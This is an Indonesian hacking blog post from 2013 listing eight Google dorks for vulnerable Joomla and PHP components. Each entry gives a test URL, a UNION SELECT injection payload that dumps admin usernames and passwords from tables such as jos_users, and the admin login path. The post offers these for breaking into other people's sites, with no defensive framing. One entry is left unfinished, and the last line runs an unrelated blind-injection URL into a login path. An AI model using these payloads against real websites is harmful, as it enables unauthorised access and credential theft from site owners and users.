Jumat, 29 Maret 2013

Joomla SQL Injections

07.49 Unknown No comments




_____________________________________________________________
1. Google dork = allinurl:option=com_user |==========================[x]. 
Cek Vulnsite/index.php?option=com_user&view=reset&layout=confirm[x]. Cek UID n Pass Adminsite/index.php?option=com_docman&task=doc_details&gid=3&Itemid=1site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=2site/index.php?option=com_docman&task=doc_details&gid=3&Itemid=3"sampai muncul tabel informasi"[x]. LoginSite/administrator
______________________________________________________________________
2. Google dork = allinurl:mod.php?mod=publisher |==============================[x]. 
Cek Vulnsite/mod.php?mod=publisher&op=viewcat&cid=2'[x]. Cek UID n Pass Adminsite/mod.php?mod=publisher&op=viewcat&cid=-2+union+all+select+1,group_concat(aid,0x3a,name,0x3a,pwd),
3+from+authors--[x]. Loginsite/admin.php
______________________________________________________________________
3. Google dork = inurl:com_gameserver |========================[x]. 
Cek VulnSite/index.php?option=com_gameserver&view=gamepanel&id=3'[x]. 
Cek UID n Pass Adminsite/index.php?option=com_gameserver&view=gamepanel&id=3+union+select+1,2,group_concat(username,
char(58),password),4+from+jos_users-–[x]. 
Cek Loginsite/path/path/path/admin
______________________________________________________________________
4. Google dork = inurl:com_digifolio |======================[x]. 
Cek Vulnsite/index.php?option=com_digifolio&view=project&id=2'[x]. 
Cek UID n Pass Adminsite/index.php?option=com_digifolio&view=project&id=-2+union+all+select+1,group_concat(username,char(58),password),3+from+jos_users-–[x]. 
Cek Loginsite/admin
______________________________________________________________________
5. Google dork = inurl:com_siirler |====================[x]. 
Cek Vulnsite/index.php?option=com_siirler&task=sdetay&sid=3'[x]. 
Cek UID n Pass Adminsite/index.php?option=com_siirler&task=sdetay&sid=-3+union+all+select+1,2,concat(username,char(58),
password),4+from+jos_users–-[x]. 
Cek Loginsite/admin
______________________________________________________________________
6. Google dork = Powered by PHP Live! v3.3 |============================[x]. 
Cek Vulnsite/message_box.php?theme=&l=[username]&x=[xxx]&deptid=2'[x]. Cek UID n Pass Adminsite/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-2+union++all+select+1,group_concat(login,char(58),password),3,4,5+from+
chat_admin–[x]. Cek Loginsite/admin
______________________________________________________________________
7. Google dork = allinurl:option=com_livechat |============================[x]. 
Cek Vulnsite/administrator/components/com_livechat/getChat.php?chat=0&last=3'[x]. 
Cek UID n Pass Adminsite/administrator/components/com_livechat/getChat.php?chat=0&last=-3+union+all+select+1,2,unhex(hex(concat(username,0×3a,password))),
4+from+"masih jadi misteri!!"
______________________________________________________________________
8. Google dork = allinurl:com_idoblog |[x]. 
Cek Vulnsite/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62'[x]. 
Cek UID n Pass Adminsite/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,
concat_ws(0×3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users–[x]. 
Cek Loginsite/administratorsite/index.php?option=com_rsgallery2&Itemid=&page=vote&catid= 
(SQL Injection Blind)

Salam Hacking (X-MORE REMIX)

Posted in: ,,

0 komentar:

Posting Komentar

 
Design by Fajri Alhadi | Published by Template Dyto Share.us | Download Film Terbaru
Sisi Remaja Ebook Teknisi Komputer